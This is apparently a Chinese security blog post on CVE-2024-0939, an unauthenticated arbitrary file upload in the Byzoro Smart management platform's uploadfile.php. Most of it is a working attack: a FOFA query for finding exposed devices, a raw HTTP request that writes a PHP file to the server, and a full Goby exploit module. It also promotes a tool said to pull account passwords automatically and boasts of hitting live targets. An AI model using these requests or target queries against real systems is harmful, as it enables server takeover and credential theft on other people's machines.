免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
百卓 Smart只管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。
百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。
smart s210
smart s210 firmware
FOFA:title=“Smart管理平台”
poc
POST /Tool/uploadfile.php? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Upgrade-Insecure-Requests: 1
Connection: close
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="1.php"
Content-Type: application/octet-stream
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"
/home/rce.php
-----------------------------13979701222747646634037182887--
验证
当然,如果你已经厌倦了手工
可以用小龙的POC,自动检测并且提取账号密码
小龙POC这里依然还是顶着干
小龙POC开源传送门: 小龙POC工具
发现漏洞很多啊,扫3个出来三个
我们不妨编写一个goby的yaml文件来进行验证
poc
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)",
"Description": "",
"Product": "",
"Homepage": "",
"DisclosureDate": "2024-02-07",
"PostTime": "2024-02-07",
"Author": "[email protected]",
"FofaQuery": "port=\"8443\"",
"GobyQuery": "port=\"8443\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/Tool/uploadfile.php",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Connection": "close",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Content-Type": "multipart/form-data; boundary=---------------------------13979701222747646634037182887",
"Upgrade-Insecure-Requests": "1"
},
"data_type": "text",
"data": "-----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"1.php\"\nContent-Type: application/octet-stream\n\n\n-----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/rce.php\n-----------------------------13979701222747646634037182887--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uploadfile",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [],
"VulType": [],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
},
"EN": {
"Name": "Byzoro Smart Management Platform Upload Vulnerability CVE-2024-0939",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
测试效果如图